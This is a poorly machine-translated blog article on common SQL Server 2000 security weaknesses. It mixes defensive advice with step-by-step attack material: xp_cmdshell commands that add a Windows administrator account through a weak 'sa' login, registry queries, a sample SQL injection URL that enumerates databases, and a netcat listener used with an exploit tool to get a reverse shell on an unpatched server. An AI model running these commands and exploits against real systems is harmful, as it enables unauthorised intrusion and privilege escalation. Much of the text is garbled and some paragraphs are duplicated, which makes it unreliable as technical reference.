SQL Server common security issues

xiaoxiao2021-03-06 20

The small king of the unit learned SQL Server for a period of time, has made a good management system, and the little king made me help to see if the library is designed, and I found that his security awareness is very weak. Perhaps the problem that beginners is easy to ignore, this article explores some common security issues in SQL Server, is to see the people who are beginning to SQL Server, and they are definitely very hot, don't read. This article is used by SQL Server 2000, which is abbreviated as SQL Server.

First, empty password or weak password

The beginner is in order to save the SQL Server, and the SQL Server administrator SA uses an empty password or a weak password. This is very dangerous, and these dangers are often unsolicited. Xiao Wang feels that their library is It is the test data, not used, even if someone else doesn't matter. As everyone knows that the default user SA of SQL Server is very great. There is a point of view that SA's permissions are greater than the authority of Administrator, that is, unrestricted SA users can do anything that Windows system administrators do.

Below we are a simple trial. Add a user USER1 to the Windows system via SQL Server and add the user to the administrator user group administrators.

1. First look at the method of adding the user in the Windows system under normal circumstances.

There are two types: one is performed under the graphical interface, and the other is under the command window, and the following demonstrates to increase the user through the command.

1) In the "Start" -> "Run", enter the CMD, enter the command window, as shown in Figure 1: 2), the first line command NET USER USER1 / Add (add a user name is User1 user). 3), the second line NET localGroupAdminisstrators User1 / Add (add this user to Administrators). 4), the third line NET user (see the user of the system, you can see that the USER1 user has been added). 5), the fourth line of NET User User1 / Delete (delete USER1 users), add users to the system through SQL Server by SQL Server.

2, add system users in SQL Server

1) Open the "Enterprise Manager" -> "Tool" -> "SQL Query Analyzer" of SQL Server. As shown in Figure 2, enter the IP address of the SQL Server to be connected, and then appear after the interface appears, pay attention to the Master library.

2), as shown in FIG. 3, enter: exec XP_cmdshell 'net user user1 / add' in the query window, press execution, if the prompt of the "successful completion" appears, the execution is successful. 3), then, as shown in FIG. 5, input EXEC XP_CMDSHELL 'NET LOCALGROALGROUP Administrators User1 / Add', and the prompts of FIG. 5 appear after successful. See this understanding! You can do things that Windows system administrators can do through powerful SQL Server. The experiment that established the user above the SQL Server is the SQL Server I remotely connected to the test machine from this machine, adds the user, Figure 7 is the IPC connection established by the original user User1 and the remote computer, then enter this machine It is easy to make things. The next security knowledge yourself check, there are very many online.

3, further explanation

The above XP_cmdshell is one of the extension stored procedures of SQL Server. The stored procedure is like the function we programped, and the content is a series of SQL statements and optional control flow statements that need to be written, and can be performed by the application through a call. And allow the user to declare the variable, conditional execution, and other powerful programming functions. Each library can store the stored procedure, but the extended stored procedure exists only in the master database. For the user, the extension stored procedure is the same as the normal stored procedure, and the implementation method is the same. However, the extended stored procedure can perform many of the operations other than the database, and we see the various commands under Windows systems by calling xp_cmdshell.

The ability to extend the stored procedure is very powerful, as shown in Figure 8, which exist during the extended stored procedure in the Master library.

Such as XP_REGENUMVALUES, XP_REGREAD, XP_REGWRITE, XP_REGDELETEVALUE, XP_REGDELETEKEY These extended stored procedures can read and write the registry. For example: You can view the startup item in the registry by the following command.

EXEC XP_REGENUMVALUES 'HKEY_LOCAL_MACHINE', 'Software / Microsoft / Windows / Currentversion / Run'

Second, injection and cross-library attack

Injection and cross-library attacks may be the most popular words in the 2004 hacker attack. Its principle and above are all permissions of SQL Server Administrator SA, thus controlling the database, and uses XP_cmdshell's SQL Server's SQL Server Extended stored procedures Control Windows System. Different methods of injection and empty passwords are different, and the injection is that the ASP program has a vulnerability when connecting SQL Server, and the hacker uses a vulnerability to acquire SA permissions. Speaking of this, Xiao Wang is a little doubtful, and the SA in the program is its own library and the expansion stored procedure is in the Master library, how to use it? Simply put, you can check what library built by users after SA, which tables in the library, what are the fields in the table, and the records of the table. How do these achieve?

To answer this question, you need to start from two aspects. When you create a new library, what changes do SQL Server play? The second is the permissions of SQL Server.

1. Create a library after its location in the system library and system table

Example: Create a library in SQL Server, the library name is: XYZ, build a TEST table under this library, the field in the table is ID, name, password.

1) Where is the library? After SQL Server installation, the 6 libraries were installed by default, where Northwind, Pubs are example libraries, others are system databases, each with it. After the XYZ library is built, the library name exists in the SysDatabases table in the master library. As shown in Figure 9, the value of the DBID field in the sysdatabases table is the user's own library. Figure 10 uses Select Name from sysdatabases where dbid> 6 can detect the library built by the user, just built the XYZ library is also there. 2) Where is the table?

Table name exists in the XYZ library, the sysobjects table and xtype = 'u', as shown in Figure 11, input SELECT * from sysObjects where xtype = 'u' can detect the table name is Test, remember our original table TEST corresponding to the table TEST Is 35757631

When a user having the corresponding permissions is connected to SQL Server, you can get the user's database name by querying the SysDatabases table in the master library, then query the SysObjects table of the user database to find the created table, then query the syscolumns table of the user database. Isors the fields in the table to identify the record.

This example refers to a user with corresponding permissions, what permissions have users? We will follow.

2, understand users, roles, and permissions these concepts

It is understood that this concept is very clear, it takes a lot of space, this article only makes a brief introduction.

To access SQL Server must be a user, if you want to access a database, you must give the user access to this database. The role is a collection of permissions. The relationship between users and roles is like the relationship between users and user groups in a Windows system.

Still an example! Why is SA have such a big permission?

SA is the default super user of SQL Server. The interface is selected, you can see the role of the SA is System Administrators, and the role is mentioned earlier is a collection of permissions, click on "Properties" in Figure 14, you can see in Figure 15. This role has all permissions to operate SQL Server. As can be seen in Figure 16, the SA has access to all databases, and now I understand why SA has such a big permission.

Do not need to manage the system when you manage the system, it is generally necessary to access your own library. You can create a new user, only give this user limited permissions, such a safety factor should be higher, from this idea to see how it is achieved. 1) New AAA users

As shown in Figure 17, the interface appears after the new login, enter the username AAA, enter a strong password.

2), set permissions

As shown in Figure 18, there is no choice in the Server Role option. As shown in Figure 19, only the "XYZ" library is selected in the Database Access option, that is "Allow" in database roles "only selects the default" public ".

3), test

After setting it, use the AAA user to log in to "SQL Query Analyzer", as shown in Figure 21, execute the exec XP_cmdshell 'Net User USER1 / Add', the expected result, no permission execution.

The SELECT NAME from SysDatabaseS WHERE DBID> 6, the result is not permission execution, and the actual result is exactly the result of the query results of Figure 10, is the AAA user not without a Master library? In addition to unable access to WZ_CXXT_NEW, AAA users can access, other libraries can access, what is the problem? The problem is in the public role, the following paragraph is written in the SQL Server Help. The public role is a special database role that belongs to it. PUBLIC role:

· Capture all the default permissions in the database in the database. · Unable to assign users, groups, or roles, because they belong to this role by default. • In each database, including Master, MSDB, Tempdb, Model, and all user databases. · Unable to remove it.

As shown in Figure 22, the "public" role in the master library, double-click "PUBLIC", click "Permissions" in the interface, appear interface, you can see the role has the access rights of sysdatabases. It can be seen that the permissions are very fine, SELECT, INSERT, UPDATE, DELETE, etc. ', The SELECT permission of owner' dbo '). "Tips. The PUBLIC role does not perform permissions for the extended stored procedure by default, but the permissions performed by the role can be given, and the permissions of the access library can also be removed. Seeing this, is it very troublesome, the setting of this privilege is a double-edged sword, setting too loose will have security vulnerabilities, too strictly in the process of running, this article cannot give a thorough solution, As long as you understand the principles, you can figure out a best solution in practice.

3, injection

For the injection of SQL Server ASP, there is an ASP connection to SQL Server users' permissions, and the ASP program itself has a vulnerability, and thus constructs a similar http: //www.6*.com/aaa.asp? Id = 2300 and 0 <> (Select Count (*) from master.dbo.sysdatabases where name> 1 and dbid = 6) This SQL statement is based on the principles of the forebel, and the corresponding records are exported.

There are many wonderful and classic articles on injection, as well as tools like NBSI2, there is not a door to the door.

Third, SQL Server does not play the vulnerability

Xiao Wang's SQL Server is installed on Win 2000, no patch, SQL Server, no patch, is a big leakage, whether your permissions are set up strict, a broken paper. The following example is an attack on a vulnerability SQL Serve (mounted on 192.168.113.10 machine), the experiment is used in the experiment, the NC and SQL2, NC alias Swiss army knife, is an old and very powerful network tool. If you want to know the details, please refer to the information on the Internet, SQL2 is SQL Serve specially attacked with vulnerabilities (SP2 below, including SP2), the process is as follows:

As shown in Figure 25, running nc -l -p 77 under the command window (running CMD) of my machine (IP address 192.168.113.207, means that the port is newly created in the port 77, runs SQL2 192.168 .113.10 192.168.113.207 77 0 If the SQL Serve on 192.168.113.10 has a vulnerability, 192.168.113.207's NC monitor window will appear the interface of Figure 26, pay attention! This interface is equipped with SQL Serve machine, in other words, we have invaded this machine. Next, look at Figure 27, the address of IPConfig checks is 192.168.113.10, it is controlled, simple!

The PUBLIC role does not perform permissions for the extended stored procedure by default, but the permissions performed by the role can be given, and the permissions of the access library can also be removed. Seeing this, is it very troublesome, the setting of this privilege is a double-edged sword, setting too loose will have security vulnerabilities, too strictly in the process of running, this article cannot give a thorough solution, As long as you understand the principles, you can figure out a best solution in practice.

3, injection

There are many wonderful and classic articles on injection, as well as tools like NBSI2, there is not a door to the door.

Third, SQL Server does not play the vulnerability

If SQL Serve on 192.168.113.10 has a vulnerability, 192.168.113.207's NC monitor window will appear on the interface of Figure 26, pay attention! This interface is equipped with SQL Serve machine, in other words, we have invaded this machine. Next, look at Figure 27, the address of IPConfig checks is 192.168.113.10, it is controlled, simple!

转载请注明原文地址:https://www.9cbs.com/read-42782.html

9cbs

New Post(0)